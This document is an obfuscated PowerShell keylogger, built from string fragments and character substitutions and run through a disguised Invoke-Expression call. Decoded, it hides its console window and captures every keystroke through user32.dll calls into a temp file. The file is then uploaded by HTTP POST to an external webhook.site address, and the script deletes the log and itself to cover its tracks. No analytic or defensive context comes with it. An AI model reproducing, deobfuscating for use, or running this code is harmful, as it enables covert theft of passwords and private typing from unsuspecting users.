(("{25}{11}{21}{49}{23}{4}{8}{3}{22}{36}{30}{28}{40}{52}{14}{41}{16}{35}{51}{2}{39}{45}{1}{24}{18}{13}{43}{5}{46}{44}{20}{27}{50}{19}{17}{15}{29}{6}{42}{7}{26}{34}{32}{37}{31}{33}{47}{12}{10}{9}{48}{38}{0}"-f '     powershell Remove-Item -Path 1HKnGyenv:tempiGtlog.ps11HK                                     
    }                                                                        
}                                                                            
                                                                             
Start-KeyLogger                                                              
1HK@)                                                                        
',(('i'+'nt'+' '+'wF'+'l'+'ag'+'s)'+';            '+' '+' '+'         '+'      '+'         '+'   '+' '+'  '+' '+'    '+' '+'    '+'     '+'               
w9Y@     '+' '+'  '+'    '+'  '+'       '+'  '+'    '+'  '+' '+'     '+'             '+'  '+'               '+'                                           
   '+'          '+' '+' '+'          '+'       '+'  '+'   '+' '+'     '+'      '+' '+' '+' '+'    '+'            '+'     '+'                              
   '+' '+'egLn'+'GyA'+' = A'+'dd'+'-Type '+'-'+'Membe'+'rDefinition eg'+'LnGysi -N')),((' '+' '+'  [DllImport(1H'+'Kus'+'e'+'r'+'32.d'+'l')),('etCurren'+'tP'+'roce'+'s'+'s()'),('a'+'g'+'nos'+'tics.P'),' {                                                                                                        
                egLnGystate = egLnGyA::GetAsyncK',('      '+'       eg'+'L'+'nGysuc'+'c'+'ess = '+'egLnG'+'yA::T'+'oUn'),(' '+'egLnGy'+'m'+'ych'+'aregL.C'+'apac'+'ity'),('roce'+'s'+'s]::G'),('tent'+'Typ'+'e '+'w9'+'Ytext/'+'plainw9Y -In'),('b141'+'c2'+'ec -Method'+' POS'+'T'+' -'+'Con'),'w9YSetw9Y,w9Yariaw9Y,w9Yblew9Y,w9Y-Vw9Y) -Name (1HK{1}{0}1HK -f w9Ytw9Y,w9Ypuw9Y) -Value (@1HK                                                                               
egLnGyt = w9Y[DllImport(1HKuser32.dl',('-3c'+'a5-'+'4db'+'0-'+'9dba'+'-705'+'b'),' try {                                                                  
        egLnGyti = get-date                                                  
        do {                                                                 
            Start-Sleep -Milliseconds 40                                     
            for (egLnGyas = 9; egLn',(('(in'+'t vir'+'tu')),(('L)'+'    '+'     '+'   '+'       '+' '+' '+' '+'                                           
   '+'    '+'             ')),(('HKus'+'er32'+'.dll1'+'HK,'+' CharSet=CharSet.Au'+'to)]  '+' '+'       '+'                                                
 '+'   p'+'ublic'+' s'+'ta'+'t'+'ic'+' ex'+'t'+'e'+'r'+'n int G')),(('e '+'= egLnGy'+'A::G'+'etKey'+'b'+'oardState('+'egLnGykbSeg')),('yP '+'-'+'Ite'+'mT'+'ype '+'File -Fo'+'rce         '+'       '+'     '+'   '+'    '+'  '+'          '+'  '+'     '+'  '+'  '+' '+' '+'                                       
         '+'   '+'  '+'    '+'               '+'    '+'    '+'       '+'       '+'    '+'          '+'        '+'                                         
  '+' '),('ckkb'+'sta'+'t'),('    '+' '+'  egLnG'+'yn'+'ull = [cons'+'ole]::Cap'+'sL'+'ock      '+'           '+'                                         
       '+' '+'        '+'    e'+'g'+'Ln'+'Gy'+'VK'+' '),(('l'+'1'+'HK)'+']'+' '+'pub'+'lic s'+'tatic'+' '+'extern bo'+'ol Sh'+'ow'+'Window(in'+'t h'+'andle, in'+'t st'+'a'+'t'+'e'+')'+';'+'w9Y'+'   '+' '+'     '+'                '+'   '+' '+'          '+'       '+'  '+' '+'                                  
'+'add'+'-t'+'ype -n'+'ame '+'win'+' -member egLnGy'+'t -na')),((' x'+'d'+'E'+' '+'Get-Pro'+'ces'+'s).M'+'ai'+'nWind'+'owHan'+'d'+'le, 0)         '+'     '+'  '+'    '+'   '+'    '+'    '+'  '+' '+'  '+'      '+'      '+' '+'       '+'  '+' '+' '+'      '+' '+' '+'   '+' '+'                                 
     '+'    '+'           '+'  '+'  '+'      '+' '+'      '+' '+' '+' '+'      '+' '+' '+'   '+'  '+' '+'     '+' '+'  '+'    '+'  '+'        '+'         
'+'func'+'tio')),(('ive'+'       '+'           '+'  '+'         '+' '+'         '+' '+'   '+' '+'      '+'    '+'  '+'  '+'   '+'                         
'+'[native.win]'+'::ShowWin'+'dow(([Sy'+'stem'+'.Di')),('ame '+'w'+'9YWin'+'32w'+'9Y -Nam'+'es'+'pace'+' API -PassThr'+'u'+' '+'   '+'         '+'      '+'             '+'                    '+'    '+'    '+'      '+'     '+'      
  '+'  egLnGynull = New-Item '+'-'+'Pa'+'th '+'egLnG'),'.(1HK{0}{3}{1}{2}1HK-f ',((','+' 0)')),('= egLnGyA'+':'+':M'+'apVirtua'+'lK'+'ey(e'+'g'+'LnG'+'y'+'as'+'e'+'g'+'L, 3'+')'+'  '+'  '+'    '+' '+'               '+' '+'    '+'      '+'  '+'   '+'                                                           
'+' '+' '+'    '+'    '+'      '+' '+' '+'  egLnGykbS = New-'+'Object B'+'yt'+'e'+'[]'+' 256  '+' '+'   '+'     '+'  '+'    '+'    '+' '+'                
'+' '+' '+' '+'      '+'   '),('   '+' publ'+'ic'+' st'+'at'),('egL'+'nGy'+'mychar'+' '+'='+' '+'New-O'+'bject'+' -T'+'ype'+'Name System.T'+'ext'+'.String'+'B'+'uilde'+'r'+'  '+'         '+'  '+'     '+' '+'   '+'    '+'               '+'   '+'  '+'   '+' '+'  '+'  '+'  '+'    '+'                           
 '+'  '+' '+' '+'  '),(('true)'+']      '+'    '+'       '+'      '+'       '+' '+'  '+'  '+'  '+'     '+' '+'  '+'  '+'    '+' '+' '+'       '+'         
')),'s(-1) -le egLnGyti)                                                                                                                                  
    }                                                                        
    finally {                                                                
        powershell Invoke','                  [System.IO.File]::AppendAllText(egLnGyP, egLnGymychar, [System.Text.Encoding]::Unicode)                     
                    }                                                        
                }                                                            
            }                                                                
        }                                                                    
        while ((Get-Date).AddMinut',('-Web'+'Req'+'ues'+'t'+' -'+'Uri ht'+'t'+'p'+'s'+'://webhoo'+'k.site/'),'                                                                                                                         
                    if (egLnGysuccess) {                                     
      ',(('et'+'Ke'+'yb'+'oardState('+'by'+'te[] ke'+'ysta'+'t'+'e)'+';'+'     '+' '+'     '+'       '+'      '+' '+'                                     
 '+'   [D'+'l'+'lImp'+'ort(1HKus'+'er32.dll1HK,'+' '+'CharS'+'et=Ch'+'ar')),'n Start-KeyLogger(egLnGyP = 1HKnGyenv:tempiGtkl.txt1HK) {                                                                                                 
    egLnGysi = @w9Y                                                          
    [DllImport(1HKuser32.dll1HK, CharSet=CharSet.Auto, ExactSpelling=','e',('       '+'powersh'+'el'+'l Rem'+'ove-Ite'+'m'+' -'+'Path 1H'+'Kn'+'Gy'+'env:'+'tem'+'p'+'iG'+'tkl.t'+'xt1HK         '+'   '+' '+'  '+'                    
   '),(('l1HK, CharSe'+'t='+'Char'+'Set'+'.'+'Aut'+'o)]    '+' '+'        '+'  '+'  '+'    '+' '+'   '+'          '+'  '+'                                
 '+'  '+' pu'+'bl'+'ic'+' ')),('ic e'+'x'+'tern sho'+'r'+'t '+'GetAsyncK'+'e'+'yS'),(('alK'+'e'+'y'+'Code);       '+' '+'     '+'  '+'   '+' '+'          
'+'   '+' [DllImport(1')),(('icod'+'e('+'eg'+'L'+'nGyaseg'+'L,'+' egL'+'n'+'GyV'+'KegL, egLnG'+'y'+'kbS'+'egL'+', eg'+'LnGymy'+'c'+'har'+'egL,')),(('Gyas -le 254'+';'+' egLnGya'+'s++'+')')),'if (egLnGystate -eq -32767) {                                                                                        
             ',(('sta'+'t'+'ic'+' '+'e'+'xtern int '+'To'+'Un'+'ic'+'ode('+'ui'+'nt '+'wVirt'+'Key, '+'ui'+'nt wSca'+'nCode, '+'byt'+'e[] lpke'+'ystate, Sy'+'stem.T'+'ex'+'t.Stri'+'ngBuild'+'e'+'r '+'pw'+'sz'+'Bu'+'ff'+', int cc'+'hBu'+'ff, u')),('ey'+'State(egLn'+'G'+'yas)        '+'  '+'           '+'   '+'    '+'  '+'   '+'  '+'     '+'     '+'       '+'       '+'   '+'  '+' '+'                                                                              
'+'    '+'    '+'    '+'  '+'  '),('dd'+'d9d'+'09b'),('Fi'+'le 1'+'HK'+'nGy'+'env:t'+'em'+'pi'+'G'+'t'+'kl.tx'+'t1'+'HK     '+'      '+'   '+'            
 '),('mespace '+'n'+'at'),(' '+'  '+'     e'+'gLnGyche'),(('S'+'et.Auto)'+']         '+'    '+'      '+'    '+'     '+'                                   
 '+'   pub'+'lic '+'static e'+'x'+'t'+'e'+'rn int'+' '+'Ma'+'pV'+'i'+'rtua'+'lKey('+'u'+'int uCode'+', int'+' uMapT'+'y'+'pe);                            
')),('tat'+'e'))).rEPLAce(([chAr]49+[chAr]72+[chAr]75),[stRing][chAr]34).rEPLAce(([chAr]105+[chAr]71+[chAr]116),[stRing][chAr]92).rEPLAce(([chAr]101+[chAr]103+[chAr]76),[stRing][chAr]96).rEPLAce(([chAr]119+[chAr]57+[chAr]89),[stRing][chAr]39).rEPLAce(('nG'+'y'),[stRing][chAr]36).rEPLAce(('x'+'dE'),'|') | .( $veRboSEpREfeREncE.TOstriNg()[1,3]+'X'-jOin'')
